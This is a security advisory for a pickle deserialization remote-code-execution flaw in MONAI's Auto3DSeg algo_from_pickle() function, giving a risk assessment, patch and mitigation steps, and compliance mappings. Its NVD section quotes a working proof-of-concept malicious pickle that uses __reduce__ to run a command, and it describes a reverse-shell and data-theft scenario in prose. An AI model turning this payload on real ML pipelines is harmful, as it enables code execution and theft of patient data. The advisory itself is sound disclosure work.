GHSA-89gg-p5r5-q6r4: MONAI: pickle deserialization RCE in Auto3DSeg

GHSA-89gg-p5r5-q6r4 HIGH
Published April 7, 2026
CISO Take

MONAI's Auto3DSeg module deserializes pickle files via algo_from_pickle() with zero input validation, allowing any actor who can supply a crafted .pkl file to achieve arbitrary code execution with ML pipeline privileges. With 99 downstream dependents and MONAI widely deployed in clinical and research medical imaging workflows, the blast radius is significant — a single poisoned algorithm checkpoint can cascade to full host compromise including access to sensitive patient imaging datasets. Although the CVSS vector rates attack complexity as high and requires privileged access and user interaction, the actual exploit payload is a five-line Python script using only the standard library, making weaponization trivial once an attacker influences which files the pipeline loads. Patch immediately to MONAI 1.5.2; in the interim, enforce strict write-access controls on all directories containing .pkl files consumed by auto3dseg pipelines.

Sources: GitHub Advisory ATLAS OpenSSF

Risk Assessment

High severity with critical-when-triggered impact profile: CVSS scope change plus C:H/I:H/A:H means full system compromise including data exfiltration and persistence when conditions are met. The AC:H and PR:H ratings reduce opportunistic exploitation likelihood, but insider threats, shared-storage poisoning, and supply chain scenarios in research GPU clusters are highly plausible. No EPSS data, not in CISA KEV, no public exploit tool yet — but the advisory's PoC is trivially reproducible. Medical imaging AI environments processing protected health information face compounded regulatory exposure under HIPAA alongside the technical risk.

Affected Systems

Package Ecosystem Vulnerable Range Patched
monai pip <= 1.5.1 1.5.2
8.1K OpenSSF 7.0 99 dependents Pushed 3d ago 100% patched ~15d to patch Full package profile →

Do you use monai? You're affected.

Severity & Risk

CVSS 3.1
7.7 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

  1. Upgrade monai to >=1.5.2 immediately — the official patch is available as of 2026-04-05.
  2. Audit all direct and transitive calls to algo_from_pickle() across your codebase, Jupyter notebooks, and CI/CD pipelines.
  3. Until patched, restrict write access to directories from which .pkl files are loaded to only the owning process account — deny write access for all other identities.
  4. Implement SHA-256 manifest files with cryptographic signatures for all serialized algorithm artifacts; verify before loading.
  5. Consider migrating algorithm persistence to safe serialization formats (JSON configs + safetensors weights) for new pipelines.
  6. Add SIEM/EDR rules to alert on subprocess execution spawned by Python ML training processes — this is the primary post-exploitation indicator.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.2 - Data for AI systems A.8.2 - AI system security
NIST AI RMF
GV-1.7 - Processes for AI risk tracking and response MS-2.5 - Manage AI risks from third-party components

Technical Details

NVD Description

### Summary The `algo_from_pickle` function in `monai/auto3dseg/utils.py` causes `pickle.loads(data_bytes)` to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities. ### Details poc ``` import pickle import subprocess class MaliciousAlgo: def __reduce__(self): return (subprocess.call, (['calc.exe'],)) malicious_algo_bytes = pickle.dumps(MaliciousAlgo()) attack_data = { "algo_bytes": malicious_algo_bytes, } attack_pickle_file = "attack_algo.pkl" with open(attack_pickle_file, "wb") as f: f.write(pickle.dumps(attack_data)) ``` Generate the malicious file "attack_algo.pkl" through POC. ``` from monai.auto3dseg.utils import algo_from_pickle attack_pickle_file = "attack_algo.pkl" result = algo_from_pickle(attack_pickle_file) ``` Ultimately, it will trigger pickle.load through a file to identify the command execution. <img width="909" height="534" alt="image" src="https://github.com/user-attachments/assets/071adbb7-3e40-4651-be48-abd2ce32470f" /> Causes of the vulnerability: ``` def algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any: with open(pkl_filename, "rb") as f_pi: data_bytes = f_pi.read() data = pickle.loads(data_bytes) ``` ### Impact Arbitrary code execution Repair suggestions Verify the data source and content before deserializing, or use a safe deserialization method

Exploitation Scenario

An adversary with write access to a shared NAS, S3 bucket, or MLflow artifact store used by an Auto3DSeg hyperparameter optimization cluster crafts a malicious .pkl file using the published PoC — a subprocess.call payload wrapped in a Python class with a custom __reduce__ method. When the automated training pipeline or an ML engineer calls algo_from_pickle() to resume an experiment or load a previously searched algorithm configuration, the payload deserialized silently executes: a reverse shell is established, GPU cluster credentials are harvested, and model weights alongside DICOM training data are exfiltrated to attacker-controlled storage. In air-gapped clinical AI environments, this same attack vector can be delivered via a compromised developer workstation or poisoned shared experiment artifact committed to a collaborative repository.

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H

Timeline

Published
April 7, 2026
Last Modified
April 7, 2026
First Seen
April 8, 2026

Related Vulnerabilities